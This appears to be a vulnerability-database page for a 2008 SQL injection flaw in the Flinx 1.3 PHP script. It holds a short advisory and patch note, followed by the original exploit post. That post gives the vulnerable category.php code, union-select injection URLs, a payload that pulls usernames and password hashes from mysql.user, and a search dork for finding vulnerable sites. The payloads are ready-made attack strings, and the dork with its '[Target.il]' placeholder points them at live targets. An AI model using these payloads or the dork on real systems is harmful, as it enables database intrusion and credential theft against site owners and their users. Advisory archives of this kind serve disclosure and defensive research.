Flinx 1.3 & Below Remote SQL Injection Vulnerability

vendor:

Flinx

by:

Houssamix

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Flinx

Affected Version From: 1.3 & Below

Affected Version To: 1.3 & Below

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Flinx 1.3 & Below Remote SQL Injection Vulnerability

A vulnerability exists in Flinx 1.3 & below which allows an attacker to inject arbitrary SQL commands. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'id' parameter in category.php. An attacker can use this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Flinx.

Source

Exploit-DB raw data:

--------------------------------------------------------------
            H-T Team [ HouSSaMix + ToXiC350 + RxH ]
--------------------------------------------------------------
# Author : Houssamix From H-T Team
# Script : flinx 1.3 & below                                          
# Download : http://rapidshare.com/files/86100439/flinx.rar.html (Nulled)                         
# BUG :  Remote SQL Injection Vulnerability  
# Dork : Powered by Flinx

## Vulnerable CODE :
~~~~~~~~ category.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?
$query="SELECT linkID FROM $table_link WHERE relCatID=$id";
$queryl=mysql_query($query);
$count=mysql_numrows($queryl);
$result=mysql_query("SELECT name FROM $table_cat WHERE catID=$id");
if ($row=mysql_fetch_array($result)){
do{
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit :
[Target.il]/[flinx_path]/category.php?id=[SQL-CODE]

tables and columns names
=> table :  flinx_cat
columns :  name / catid
=> table : flinx_link
columns :  name  / url / image / relCatID / width / height

exemple :
http://site.com/flinx/category.php?id=-999 union select name from flinx_cat--

we can also try get user and password from mysql.user :
our user needs to be root@localhost or administrator mysql, check:
http://site.com/flinx/category.php?id=-999/**/union/**/select/**/user()/*
user and password from mysql.user:
http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/**/mysql.user/*

# Gr33tz :  CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers       

# milw0rm.com [2008-01-25]